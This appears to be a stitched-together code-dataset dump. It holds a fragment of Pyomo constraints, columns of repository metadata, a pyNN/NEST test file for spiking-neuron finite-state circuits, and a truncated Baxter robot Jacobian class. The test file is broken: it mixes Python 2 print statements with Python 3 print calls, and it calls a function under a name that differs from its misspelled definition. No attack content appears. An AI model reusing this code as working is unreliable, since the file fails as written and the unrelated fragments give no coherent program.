m.c2224 = Constraint(expr= - m.x139 + m.x282 <= 0)
m.c2225 = Constraint(expr= - m.x140 + m.x283 <= 0)
m.c2226 = Constraint(expr= - m.x141 + m.x284 <= 0)
m.c2227 = Constraint(expr= - m.x142 + m.x285 <= 0)
m.c2228 = Constraint(expr= - m.x143 + m.x286 <= 0)
m.c2229 = Constraint(expr= - m.x144 + m.x287 <= 0)
m.c2230 = Constraint(expr= - m.x145 + m.x288 <= 0)
m.c2231 = Constraint(expr= - m.x146 + m.x289 <= 0)
m.c2232 = Constraint(expr= - m.x147 + m.x290 <= 0)
m.c2233 = Constraint(expr= - m.x148 + m.x291 <= 0)
m.c2234 = Constraint(expr= - m.x149 + m.x292 <= 0)
m.c2235 = Constraint(expr= - m.x150 + m.x293 <= 0)
| 35.545585
| 118
| 0.604196
| 31,684
| 173,889
| 3.315964
| 0.089256
| 0.297688
| 0.31838
| 0.028983
| 0.808629
| 0.765902
| 0.723994
| 0.567041
| 0.50149
| 0.195559
| 0
| 0.296595
| 0.19532
| 173,889
| 4,891
| 119
| 35.552852
| 0.454258
| 0.003911
| 0
| 0.003037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00038
| 0
| 0.00038
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 485bfb09788bacd2c5ffd0f1e69ee28ffc5daf91
| 23,499
| py
| Python
| tests/fsaTests.py
| dainiuskreivenas/rbs
| 1d371963ccd64976b3f0603dead891f51996cfb1
| ["MIT"]
| 1
| 2021-10-04T17:44:04.000Z
| 2021-10-04T17:44:04.000Z
| tests/fsaTests.py
| dainiuskreivenas/rbs
| 1d371963ccd64976b3f0603dead891f51996cfb1
| ["MIT"]
| 12
| 2019-07-16T08:31:50.000Z
| 2019-11-19T17:58:53.000Z
| tests/fsaTests.py
| dainiuskreivenas/rbs
| 1d371963ccd64976b3f0603dead891f51996cfb1
| ["MIT"]
| null | null | null |
#import pyNN.spiNNaker as sim
import pyNN.nest as sim
from .. import FSAHelperFunctions
from .. import NealCoverFunctions
simName = "nest"
runtime = 1000
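# All tests below follow the same pattern: build the populations, wire them with one FSA
# primitive, drive the source CA from a spike source, run the simulation, and report success
# based on whether the target population produced spikes.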
def createNeurons(fsa):
    ca = sim.Population(fsa.CA_SIZE, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "CA")
    fsa.makeCA(ca, 0)
    ca2 = sim.Population(fsa.CA_SIZE, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "CA 2")
    fsa.makeCA(ca2, 0)
    ca3 = sim.Population(fsa.CA_SIZE, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "CA 3")
    fsa.makeCA(ca3, 0)
    n1 = sim.Population(1, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "Neuron 1")
    n2 = sim.Population(1, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "Neuron 2")
    n3 = sim.Population(1, sim.IF_cond_exp, fsa.CELL_PARAMS, label = "Neuron 3")
    n1.record("spikes")
    n2.record("spikes")
    n3.record("spikes")
    ca.record("spikes")
    ca2.record("spikes")
    ca3.record("spikes")
    return ca,ca2,ca3,n1,n2,n3
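# Minimal helper sketch (not in the original file): factors out the spike-source setup that
# every test below repeats. The name makeSpikeSource is hypothetical; the calls mirror the
# existing pattern exactly.
def makeSpikeSource(offset=5):
    spikeTimes = {'spike_times': [[sim.get_current_time() + offset]]}
    return sim.Population(1, sim.SpikeSourceArray, spikeTimes)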
def stateToState():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateTurnsOnState(ca,0,ca2,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(ca2.get_data().segments[0].spiketrains[0]) > 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = ca2.get_data()
        print("ca2")
        print(data.segments[0].spiketrains[0])
    print("State To State - {}".format(success))
def stateToNeuron():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(n1.get_data().segments[0].spiketrains[0]) > 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = n1.get_data()
        print("n1")
        print(data.segments[0].spiketrains[0])
    print("State To Neuron - {}".format(success))
def twoStateToState():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateHalfTurnsOnState(ca,0,ca3,0)
    fsa.stateHalfTurnsOnState(ca2,0,ca3,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(ca3.get_data().segments[0].spiketrains[0]) > 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = ca2.get_data()
        print("ca2")
        print(data.segments[0].spiketrains[0])
        data = ca3.get_data()
        print("ca3")
        print(data.segments[0].spiketrains[0])
    print("2 State To State - {}".format(success))
def twoStateToState_Half():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateHalfTurnsOnState(ca,0,ca3,0)
    fsa.stateHalfTurnsOnState(ca2,0,ca3,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(ca3.get_data().segments[0].spiketrains[0]) == 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = ca2.get_data()
        print("ca2")
        print(data.segments[0].spiketrains[0])
        data = ca3.get_data()
        print("ca3")
        print(data.segments[0].spiketrains[0])
    print("2 State To State Half - {}".format(success))
def twoStateToNeuron():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateHalfTurnsOnOneNueron(ca,0,n1,0)
    fsa.stateHalfTurnsOnOneNueron(ca2,0,n1,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(n1.get_data().segments[0].spiketrains[0]) > 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = ca2.get_data()
        print("ca2")
        print(data.segments[0].spiketrains[0])
        data = n1.get_data()
        print("n1")
        print(data.segments[0].spiketrains[0])
    print("2 State To Neuron - {}".format(success))
def twoStateToNeuron_Half():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateHalfTurnsOnOneNueron(ca,0,n1,0)
    fsa.stateHalfTurnsOnOneNueron(ca2,0,n1,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(n1.get_data().segments[0].spiketrains[0]) == 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = ca2.get_data()
        print("ca2")
        print(data.segments[0].spiketrains[0])
        data = n1.get_data()
        print("n1")
        print(data.segments[0].spiketrains[0])
    print("2 State To Neuron Half - {}".format(success))
def neuronToState():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
    fsa.oneNeuronTurnsOnState(n1,0,ca2,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(ca2.get_data().segments[0].spiketrains[0]) > 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = ca2.get_data()
        print("ca2")
        print(data.segments[0].spiketrains[0])
        data = n1.get_data()
        print("n1")
        print(data.segments[0].spiketrains[0])
    print("Neuron To State - {}".format(success))
def neuronToNeuron():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
    fsa.oneNeuronTurnsOnOneNeuron(n1,0,n2,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(n2.get_data().segments[0].spiketrains[0]) > 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = n1.get_data()
        print("n1")
        print(data.segments[0].spiketrains[0])
        data = n2.get_data()
        print("n2")
        print(data.segments[0].spiketrains[0])
    print("Neuron To Neuron - {}".format(success))
def twoNeuronToState():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
    fsa.stateTurnsOnOneNeuron(ca,0,n2,0)
    fsa.oneNeuronHalfTurnsOnState(n1,0,ca2,0)
    fsa.oneNeuronHalfTurnsOnState(n2,0,ca2,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(ca2.get_data().segments[0].spiketrains[0]) > 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = ca2.get_data()
        print("ca2")
        print(data.segments[0].spiketrains[0])
        data = n1.get_data()
        print("n1")
        print(data.segments[0].spiketrains[0])
        data = n2.get_data()
        print("n2")
        print(data.segments[0].spiketrains[0])
    print("2 Neuron To State - {}".format(success))
def twoNeuronToState_Half():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
    fsa.oneNeuronHalfTurnsOnState(n1,0,ca2,0)
    fsa.oneNeuronHalfTurnsOnState(n2,0,ca2,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(ca2.get_data().segments[0].spiketrains[0]) == 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = ca2.get_data()
        print("ca2")
        print(data.segments[0].spiketrains[0])
        data = n1.get_data()
        print("n1")
        print(data.segments[0].spiketrains[0])
        data = n2.get_data()
        print("n2")
        print(data.segments[0].spiketrains[0])
    print("2 Neuron To State Half - {}".format(success))
def twoNeuronToNeuron():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
    fsa.stateTurnsOnOneNeuron(ca,0,n2,0)
    fsa.oneNeuronHalfTurnsOnOneNeuron(n1,0,n3,0)
    fsa.oneNeuronHalfTurnsOnOneNeuron(n2,0,n3,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(n3.get_data().segments[0].spiketrains[0]) > 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = n1.get_data()
        print("n1")
        print(data.segments[0].spiketrains[0])
        data = n2.get_data()
        print("n2")
        print(data.segments[0].spiketrains[0])
        data = n3.get_data()
        print("n3")
        print(data.segments[0].spiketrains[0])
    print("2 Neuron To Neuron - {}".format(success))
def twoNeuronToNeuron_Half():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
    fsa.oneNeuronHalfTurnsOnState(n1,0,n3,0)
    fsa.oneNeuronHalfTurnsOnState(n2,0,n3,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(n3.get_data().segments[0].spiketrains[0]) == 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = n1.get_data()
        print("n1")
        print(data.segments[0].spiketrains[0])
        data = n2.get_data()
        print("n2")
        print(data.segments[0].spiketrains[0])
        data = n3.get_data()
        print("n3")
        print(data.segments[0].spiketrains[0])
    print("2 Neuron To Neuron Half - {}".format(success))
def neruonAndStateToState():
    neal = NealCoverFunctions(simName, sim)
    fsa = FSAHelperFunctions(simName, sim, neal)
    ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
    fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
    fsa.oneNeuronHalfTurnsOnState(n1,0,ca3,0)
    fsa.stateHalfTurnsOnState(ca2,0,ca3,0)
    spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
    spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
    fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
    neal.nealApplyProjections()
    sim.run(runtime)
    success = len(ca3.get_data().segments[0].spiketrains[0]) > 0
    if not success:
        data = ca.get_data()
        print("ca")
        print(data.segments[0].spiketrains[0])
        data = ca2.get_data()
        print("ca2")
        print(data.segments[0].spiketrains[0])
        data = ca3.get_data()
        print("ca3")
        print(data.segments[0].spiketrains[0])
        data = n1.get_data()
        print("n1")
        print(data.segments[0].spiketrains[0])
    print("Neuron And State To State - {}".format(success))
def neuronAndStateToState_NotNeuron():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnState(n1,0,ca3,0)
fsa.stateHalfTurnsOnState(ca2,0,ca3,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca3.get_data().segments[0].spiketrains[0]) == 0
if not success:
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = ca3.get_data()
print "ca3"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
print "Neuron And State To State NotNeuron - {}".format(success)
def neuronAndStateToState_NotState():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnState(n1,0,ca3,0)
fsa.stateHalfTurnsOnState(ca2,0,ca3,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca3.get_data().segments[0].spiketrains[0]) == 0
if not success:
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = ca3.get_data()
print "ca3"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
print "Neuron And State To State NotState - {}".format(success)
def neuronAndStateToNeuron():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnOneNeuron(n1,0,n2,0)
fsa.stateHalfTurnsOnOneNueron(ca2,0,n2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n2.get_data().segments[0].spiketrains[0]) > 0
if not success:
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
print "Neuron And State To Neuron - {}".format(success)
def neuronAndStateToNeuron_NotNeuron():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnOneNeuron(n1,0,n2,0)
fsa.stateHalfTurnsOnOneNueron(ca2,0,n2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n2.get_data().segments[0].spiketrains[0]) == 0
if not success:
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
print "Neuron And State To Neuron NotNeuron - {}".format(success)
def neuronAndStateToNeuron_NotState():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronHalfTurnsOnOneNeuron(n1,0,n2,0)
fsa.stateHalfTurnsOnOneNueron(ca2,0,n2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n2.get_data().segments[0].spiketrains[0]) == 0
if not success:
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
print "Neuron And State To Neuron NotState - {}".format(success)
def threeStateRule():
"""
STATE1 ===>
+ ===> N1 ===>
STATE2 ===> + ===> A1 ===> STATE4
STATE3 ===>
"""
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateHalfTurnsOnOneNueron(ca,0,n1,0)
fsa.stateHalfTurnsOnOneNueron(ca2,0,n1,0)
fsa.oneNeuronHalfTurnsOnOneNeuron(n1,0,n2,0)
fsa.stateHalfTurnsOnOneNueron(ca3,0,n2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+10]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca2,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+15]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca3,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(n2.get_data().segments[0].spiketrains[0]) > 0
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = ca2.get_data()
print "ca2"
print data.segments[0].spiketrains[0]
data = ca3.get_data()
print "ca3"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
data = n2.get_data()
print "n2"
print data.segments[0].spiketrains[0]
print "Three State Rule - {}".format(success)
def oneNeuronStopsCA():
neal = NealCoverFunctions(simName, sim)
fsa = FSAHelperFunctions(simName, sim, neal)
ca,ca2,ca3,n1,n2,n3 = createNeurons(fsa)
fsa.stateTurnsOnOneNeuron(ca,0,n1,0)
fsa.oneNeuronTurnsOffState(n1,0,ca,0)
spikeTimes = {'spike_times': [[sim.get_current_time()+5]]}
spikeGen = sim.Population(1, sim.SpikeSourceArray, spikeTimes)
fsa.turnOnStateFromSpikeSource(spikeGen,ca,0)
neal.nealApplyProjections()
sim.run(runtime)
success = len(ca.get_data().segments[0].spiketrains[0]) == len(n1.get_data().segments[0].spiketrains[0])
if(not success):
data = ca.get_data()
print "ca"
print data.segments[0].spiketrains[0]
data = n1.get_data()
print "n1"
print data.segments[0].spiketrains[0]
print "One Neuron stops CA - {}".format(success)
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
stateToState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
stateToNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoStateToState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoStateToState_Half()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoStateToNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoStateToNeuron_Half()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronToState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronToNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoNeuronToState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoNeuronToState_Half()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoNeuronToNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
twoNeuronToNeuron_Half()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronAndStateToState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronAndStateToState_NotNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronAndStateToState_NotState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronAndStateToNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronAndStateToNeuron_NotNeuron()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
neuronAndStateToNeuron_NotState()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
threeStateRule()
sim.end()
sim.setup(timestep=1.0,min_delay=1.0,max_delay=1.0, debug=0)
oneNeuronStopsCA()
sim.end()
| 28.142515
| 108
| 0.657219
| 3,027
| 23,499
| 5.025107
| 0.034688
| 0.041417
| 0.076918
| 0.142003
| 0.92558
| 0.918349
| 0.902045
| 0.902045
| 0.899941
| 0.892643
| 0
| 0.046372
| 0.203455
| 23,499
| 834
| 109
| 28.176259
| 0.766268
| 0.001192
| 0
| 0.829392
| 0
| 0
| 0.043631
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.005068
| null | null | 0.266892
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f915f5768c864bd648907fd51932f4176fdc3c1
| 24,177
|
py
|
Python
|
python/baxter_bon_appetit/src/baxter_essentials/baxter_jacobian.py
|
san99tiago/tesis
|
70e452cfa9eedbbe64347e2bd8826bb295473d01
|
[
"MIT"
] | 4
|
2021-03-09T19:59:50.000Z
|
2021-03-31T01:28:24.000Z
|
python/baxter_bon_appetit/src/baxter_essentials/baxter_jacobian.py
|
san99tiago/tesis
|
70e452cfa9eedbbe64347e2bd8826bb295473d01
|
[
"MIT"
] | null | null | null |
python/baxter_bon_appetit/src/baxter_essentials/baxter_jacobian.py
|
san99tiago/tesis
|
70e452cfa9eedbbe64347e2bd8826bb295473d01
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Built-in imports
import math
# General module imports
import numpy as np
class BaxterJacobian:
"""
Calculate Baxter's Jacobian from w0 to tool.
Remark: the expression used was calculated based on the article
"Baxter Humanoid Robot Kinematics" from Ohio University.
:param baxter_distances: list of baxter_distances from BaxterClass.
:param joint_values: list of joint-values.
example: [value_limb_s0, value_limb_s1, value_limb_left_e0,
value_limb_left_e1, value_limb_left_w0, value_limb_left_w1,
value_limb_left_w2]
:param limb: arm to calculate jacobian.
example: "left" or "right".
"""
def __init__(self, baxter_distances, joint_values, limb):
self.baxter_distances = baxter_distances
self.joint_values = joint_values
self.limb = limb
def calculate_jacobian(self):
t1 = self.joint_values[0]
t2 = self.joint_values[1]
t3 = self.joint_values[2]
t4 = self.joint_values[3]
t5 = self.joint_values[4]
t6 = self.joint_values[5]
L1 = self.baxter_distances[1]
L2 = self.baxter_distances[2]
L3 = self.baxter_distances[3]
L4 = self.baxter_distances[4]
L5 = self.baxter_distances[5]
if (self.limb == "left"):
return "LEFT JACOBIAN NOT DEFINED"
return np.array([[ (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.sin(t3)*(math.cos(t4)*(L1 + L2*math.cos(t2)) + math.cos(t2)*(L4 + L3*math.sin(t4))) + L5*math.sin(t5)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))) + (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.sin(t3)*(math.sin(t4)*(L1 + L2*math.cos(t2)) - L3*math.cos(t2)*math.cos(t4)) + L5*math.sin(t5)*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - L5*math.cos(t2)*math.cos(t5)*math.sin(t3)) - (math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - 